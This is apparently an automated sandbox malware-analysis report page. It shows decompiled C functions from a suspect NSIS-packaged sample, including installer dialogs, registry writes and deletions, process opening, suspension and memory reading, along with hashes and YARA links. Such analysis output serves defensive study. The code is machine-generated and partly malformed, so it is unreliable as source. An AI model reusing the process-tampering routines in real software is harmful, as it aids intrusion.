                        C-Code - Quality: 100%
                        			E00404782(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                        0x00404790
                        0x0040479d
                        0x004047a3
                        0x004047e1
                        0x004047e1
                        0x004047f0
                        0x004047f7
                        0x00000000
                        0x004047f9
                        0x004047a5
                        0x004047b4
                        0x004047bc
                        0x004047bf
                        0x004047d1
                        0x004047d7
                        0x004047de
                        0x00000000
                        0x004047de
                        0x00000000

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Message$Send$ClientScreen
                        • String ID: f
                        • API String ID: 41195575-1993550816
                        • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                        • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
                        • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                        • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414c40; // 0x8800
					_t11 =  *0x428c50;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                        0x00402b7b
                        0x00402b89
                        0x00402b8f
                        0x00402b8f
                        0x00402b9d
                        0x00402b9f
                        0x00402ba5
                        0x00402bac
                        0x00402bae
                        0x00402bae
                        0x00402bc4
                        0x00402bd4
                        0x00402be6
                        0x00402be6
                        0x00402bee

                        APIs
                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                        • MulDiv.KERNEL32(00008800,00000064,?), ref: 00402BB4
                        • wsprintfA.USER32 ref: 00402BC4
                        • SetWindowTextA.USER32(?,?), ref: 00402BD4
                        • SetDlgItemTextA.USER32 ref: 00402BE6
                        Strings
                        • verifying installer: %d%%, xrefs: 00402BBE
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Text$ItemTimerWindowwsprintf
                        • String ID: verifying installer: %d%%
                        • API String ID: 1451636040-82062127
                        • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                        • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
                        • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                        • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 733341A0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 159COMMON
                        Download Yara Rule
                        C-Code - Quality: 35%
                        			E733341A0(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, int _a24, int _a28, int _a32) {
				int _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				int _v44;
				void* _v48;
				int _t67;
				intOrPtr _t68;
				intOrPtr _t70;
				int _t71;
				int _t73;
				int _t77;
				int _t80;
				int _t89;
				void* _t117;
				void* _t122;
				void* _t123;
				void* _t124;

				_v40 = E73331490(_a4);
				_v36 = 0x80004005;
				_t67 = _a24;
				0x73330000(_a20, _t67, _a28, _a32);
				_t68 = _a12;
				0x73330000(_t68, _a16, _t67);
				0x73330000("%p, %u, %s, %s, %p, %u, %p.\n", _a4, _a8, _t68);
				_push(_v40);
				_t70 = E73331120(_v40);
				_t122 = _t117 + 0x34;
				_v20 = _t70;
				if(_v20 == 0) {
					return 0x8000ffff;
				}
				__eflags = _a8 - 0xffffffff;
				if(__eflags != 0) {
					_t71 = E733313B0(__eflags, _v20, _a8);
					_t123 = _t122 + 8;
					_v12 = _t71;
				} else {
					_t89 = E733313F0(__eflags, _v20, _a12, _a16);
					_t123 = _t122 + 0xc;
					_v12 = _t89;
				}
				__eflags = _v12;
				if(_v12 != 0) {
					_t73 = GetFileVersionInfoSizeA(_v12 + 0x40,  &_v44);
					_v8 = _t73;
					__eflags = _v8;
					if(_v8 != 0) {
						0x73330000(_v8);
						_t124 = _t123 + 4;
						_v16 = _t73;
						__eflags = _v16;
						if(_v16 != 0) {
							_t77 = GetFileVersionInfoA(_v12 + 0x40, _v44, _v8, _v16);
							__eflags = _t77;
							if(_t77 == 0) {
								L27:
								0x73330000(_v16);
								return _v36;
							}
							_t80 = VerQueryValueA(_v16, _a20,  &_v48,  &_v8);
							__eflags = _t80;
							if(_t80 == 0) {
								goto L27;
							}
							__eflags = _a32;
							if(_a32 != 0) {
								 *_a32 = _v8;
							}
							__eflags = _a24;
							if(_a24 != 0) {
								__eflags = _a28;
								if(_a28 != 0) {
									__eflags = _v8 - _a28;
									if(_v8 >= _a28) {
										_v24 = _a28;
									} else {
										_v24 = _v8;
									}
									_v28 = _v24;
									__eflags = _v28;
									if(_v28 != 0) {
										0x73330000(_a24, _v48, _v28);
										_t124 = _t124 + 0xc;
									}
								}
							}
							__eflags = _a24;
							if(_a24 == 0) {
								L25:
								_v32 = 0;
								L26:
								_v36 = _v32;
								goto L27;
							}
							__eflags = _a28 - _v8;
							if(_a28 >= _v8) {
								goto L25;
							}
							_v32 = 1;
							goto L26;
						}
						return 0x8007000e;
					}
					return 0x80004005;
				} else {
					0x73330000("Was unable to locate module.\n");
					return 0x80070057;
				}
			}


























                        0x733341b2
                        0x733341b5
                        0x733341c4
                        0x733341cc
                        0x733341d9
                        0x733341dd
                        0x733341f3
                        0x733341fe
                        0x733341ff
                        0x73334204
                        0x73334207
                        0x7333420e
                        0x00000000
                        0x73334210
                        0x7333421a
                        0x7333421e
                        0x73334241
                        0x73334246
                        0x73334249
                        0x73334220
                        0x7333422c
                        0x73334231
                        0x73334234
                        0x73334234
                        0x7333424c
                        0x73334250
                        0x73334274
                        0x73334279
                        0x7333427c
                        0x73334280
                        0x73334290
                        0x73334295
                        0x73334298
                        0x7333429b
                        0x7333429f
                        0x733342be
                        0x733342c3
                        0x733342c5
                        0x73334358
                        0x7333435c
                        0x00000000
                        0x73334364
                        0x733342db
                        0x733342e0
                        0x733342e2
                        0x00000000
                        0x00000000
                        0x733342e4
                        0x733342e8
                        0x733342f0
                        0x733342f0
                        0x733342f2
                        0x733342f6
                        0x733342f8
                        0x733342fc
                        0x73334301
                        0x73334304
                        0x73334311
                        0x73334306
                        0x73334309
                        0x73334309
                        0x73334317
                        0x7333431a
                        0x7333431e
                        0x7333432c
                        0x73334331
                        0x73334331
                        0x7333431e
                        0x733342fc
                        0x73334334
                        0x73334338
                        0x7333434b
                        0x7333434b
                        0x73334352
                        0x73334355
                        0x00000000
                        0x73334355
                        0x7333433d
                        0x73334340
                        0x00000000
                        0x00000000
                        0x73334342
                        0x00000000
                        0x73334342
                        0x00000000
                        0x733342a1
                        0x00000000
                        0x73334252
                        0x73334257
                        0x00000000
                        0x7333425f

                        Strings
                        • %p, %u, %s, %s, %p, %u, %p., xrefs: 733341EE
                        • Was unable to locate module., xrefs: 73334252
                        Memory Dump Source
                        • Source File: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: %p, %u, %s, %s, %p, %u, %p.$Was unable to locate module.
                        • API String ID: 0-1385147342
                        • Opcode ID: f1114a8731c4240bf0fe66c0c447a9536fb22e3bec0452f972c8ee02f4148ad1
                        • Instruction ID: a25e2de5e64b4c103f7ed6dcf5e0b523ef4e9a6e231e07d109ef499e5ed2364a
                        • Opcode Fuzzy Hash: f1114a8731c4240bf0fe66c0c447a9536fb22e3bec0452f972c8ee02f4148ad1
                        • Instruction Fuzzy Hash: 89512EB5D00219EBEB14CF94DD80BDE73B9AF49314F94C218E916A7240D738EA51CF62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 73336A70, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92COMMON
                        Download Yara Rule
                        C-Code - Quality: 17%
                        			E73336A70(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long* _t49;

				_v28 = E733314A0(_a4);
				0x73330000("%p, %#x, %u.\n", _a4, _a8, _a12);
				_push(_v28);
				_v8 = E73331120(_a4);
				if(_v8 != 0) {
					if((_v8[1] & 0x00000001) == 0) {
						0x73330000("Unsupported attach flags %#x.\n", _v8[1]);
						return 0x80004001;
					}
					if((_v8[1] & 0x00000004) != 0) {
						_v16 = 0;
					} else {
						_v16 = 1;
					}
					_v20 = _v16;
					_v12 = 0x1030;
					if(_v20 != 0) {
						_v12 = _v12 | 0x00000800;
					}
					_v8[2] = OpenProcess(_v12, 0,  *_v8);
					if(_v8[2] != 0) {
						if(_v20 != 0) {
							_t49 = _v8;
							0x73330000( *((intOrPtr*)(_t49 + 8)));
							_v24 = _t49;
							if(_v24 != 0) {
								0x73330000("Failed to suspend a process, status %#x.\n", _v24);
							}
						}
						return 0;
					} else {
						0x73330000("Failed to get process handle for pid %#x.\n",  *_v8);
						return 0x8000ffff;
					}
				}
				return 0x8000ffff;
			}










                        0x73336a82
                        0x73336a96
                        0x73336aa1
                        0x73336aaa
                        0x73336ab1
                        0x73336ac6
                        0x73336b82
                        0x00000000
                        0x73336b8a
                        0x73336ad5
                        0x73336ae0
                        0x73336ad7
                        0x73336ad7
                        0x73336ad7
                        0x73336aea
                        0x73336aed
                        0x73336af8
                        0x73336b03
                        0x73336b03
                        0x73336b1b
                        0x73336b25
                        0x73336b45
                        0x73336b47
                        0x73336b4e
                        0x73336b56
                        0x73336b5d
                        0x73336b68
                        0x73336b6d
                        0x73336b5d
                        0x00000000
                        0x73336b27
                        0x73336b32
                        0x00000000
                        0x73336b3a
                        0x73336b25
                        0x00000000

                        APIs
                        • OpenProcess.KERNEL32(00001030,00000000,00000000), ref: 73336B12
                        Strings
                        • Failed to get process handle for pid %#x., xrefs: 73336B2D
                        • %p, %#x, %u., xrefs: 73336A91
                        • Failed to suspend a process, status %#x., xrefs: 73336B63
                        • Unsupported attach flags %#x., xrefs: 73336B7D
                        Memory Dump Source
                        • Source File: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: OpenProcess
                        • String ID: %p, %#x, %u.$Failed to get process handle for pid %#x.$Failed to suspend a process, status %#x.$Unsupported attach flags %#x.
                        • API String ID: 3743895883-1030270061
                        • Opcode ID: 2756c5ce512a6f38cb83804eacbea457c3a64d8ef0bcb635e6cbaaa61a44c5af
                        • Instruction ID: 41d908174bb3357fa2a309d671ae5119db3416ddabbf6d0c7571de4d47eefb64
                        • Opcode Fuzzy Hash: 2756c5ce512a6f38cb83804eacbea457c3a64d8ef0bcb635e6cbaaa61a44c5af
                        • Instruction Fuzzy Hash: 25313EB5E00108EFDB20DF94C985BAEB7B9AB45305F55C168E8065B341D735AE80CF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 85%
                        			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x42ecd0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a440) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a440 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
				return 0;
			}











                        0x00402337
                        0x0040233c
                        0x00402346
                        0x00402350
                        0x00402353
                        0x0040235d
                        0x0040236d
                        0x00402374
                        0x0040237c
                        0x0040238a
                        0x0040238e
                        0x00402399
                        0x00402399
                        0x0040239d
                        0x004023a1
                        0x004023a7
                        0x004023ac
                        0x004023ac
                        0x004023b0
                        0x004023bc
                        0x004023bc
                        0x004023d5
                        0x004023d7
                        0x004023d7
                        0x004023da
                        0x004024b0
                        0x004024b0
                        0x004028c1
                        0x004028cd

                        APIs
                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk2A27.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                        • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk2A27.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk2A27.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CloseCreateValuelstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\nsk2A27.tmp
                        • API String ID: 1356686001-2891166307
                        • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                        • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
                        • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                        • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 73332D80, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70COMMON
                        Download Yara Rule
                        C-Code - Quality: 45%
                        			E73332D80(void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16, long _a20, intOrPtr* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				void* _t24;
				intOrPtr _t28;

				_v12 = E73331480(_a4);
				_v8 = 0;
				_t24 = _a16;
				0x73330000(_a8, _a12, _t24, _a20, _a24);
				0x73330000("%p, %s, %p, %u, %p.\n", _a4, _t24);
				_push(_v12);
				 *0x73338000 = E73331120(_a4);
				if( *0x73338000 != 0) {
					_t28 =  *0x73338000;
					_t39 =  *(_t28 + 8);
					if(ReadProcessMemory( *(_t28 + 8), _a8, _a16, _a20,  &_v16) == 0) {
						_v8 = E73337770(_t39, GetLastError());
						0x73330000("Failed to read process memory %#x.\n", _v8);
					} else {
						if(_a24 != 0) {
							 *_a24 = _v16;
						}
					}
					return _v8;
				}
				return 0x8000ffff;
			}








                        0x73332d92
                        0x73332d95
                        0x73332da4
                        0x73332db0
                        0x73332dc2
                        0x73332dcd
                        0x73332dd6
                        0x73332de2
                        0x73332dfb
                        0x73332e00
                        0x73332e0c
                        0x73332e2d
                        0x73332e39
                        0x73332e0e
                        0x73332e12
                        0x73332e1a
                        0x73332e1a
                        0x73332e1c
                        0x00000000
                        0x73332e41
                        0x00000000

                        APIs
                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 73332E04
                        Strings
                        • %p, %s, %p, %u, %p., xrefs: 73332DBD
                        • Failed to read process memory %#x., xrefs: 73332E34
                        Memory Dump Source
                        • Source File: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID: %p, %s, %p, %u, %p.$Failed to read process memory %#x.
                        • API String ID: 1726664587-1385917401
                        • Opcode ID: f04d9c343f32271dfcbeadc5ebdf528bb6fcc82ec460be18fed5908d4e0f0517
                        • Instruction ID: 6eb712d907476569c8bf6042c718d383536fcce010f52fdc2da5820d0f61b460
                        • Opcode Fuzzy Hash: f04d9c343f32271dfcbeadc5ebdf528bb6fcc82ec460be18fed5908d4e0f0517
                        • Instruction Fuzzy Hash: CE212CF6E00208AFDB20DF98D945FDA77B8AB4D205F50C158F909DB250E738EA55CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ecd0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F57(4);
					if(_t27 == 0) {
						__eflags =  *0x42ecd0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
				}
				return _t18;
			}










                        0x00402a79
                        0x00402a8a
                        0x00402a92
                        0x00402aba
                        0x00402aa1
                        0x00402aa4
                        0x00402af4
                        0x00402afa
                        0x00402afc
                        0x00000000
                        0x00402afc
                        0x00402ab1
                        0x00402ab6
                        0x00402ab8
                        0x00000000
                        0x00000000
                        0x00402ab8
                        0x00402acf
                        0x00402ad7
                        0x00402ade
                        0x00402b04
                        0x00402b0a
                        0x00000000
                        0x00000000
                        0x00402b12
                        0x00402b18
                        0x00402b1a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402b1a
                        0x00000000
                        0x00402aed
                        0x00402b01

                        APIs
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                        • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                        • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Close$DeleteEnumOpen
                        • String ID:
                        • API String ID: 1912718029-0
                        • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                        • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
                        • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                        • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                        0x00401ce8
                        0x00401cef
                        0x00401d1e
                        0x00401d26
                        0x00401d2d
                        0x00401d2d
                        0x004028c1
                        0x004028cd

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                        • String ID:
                        • API String ID: 1849352358-0
                        • Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                        • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
                        • Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                        • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404678, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
			}



















                        0x0040467e
                        0x00404683
                        0x0040468b
                        0x0040468c
                        0x00404699
                        0x004046a1
                        0x004046a2
                        0x004046a4
                        0x004046a6
                        0x004046a8
                        0x004046ab
                        0x004046ab
                        0x004046b2
                        0x004046b8
                        0x004046b8
                        0x004046bf
                        0x004046c6
                        0x004046c9
                        0x004046cc
                        0x004046cc
                        0x004046d0
                        0x004046e0
                        0x004046e2
                        0x004046e5
                        0x0040468e
                        0x0040468e
                        0x00404695
                        0x00404695
                        0x004046ed
                        0x004046f8
                        0x0040470e
                        0x0040471e
                        0x0040473a

                        APIs
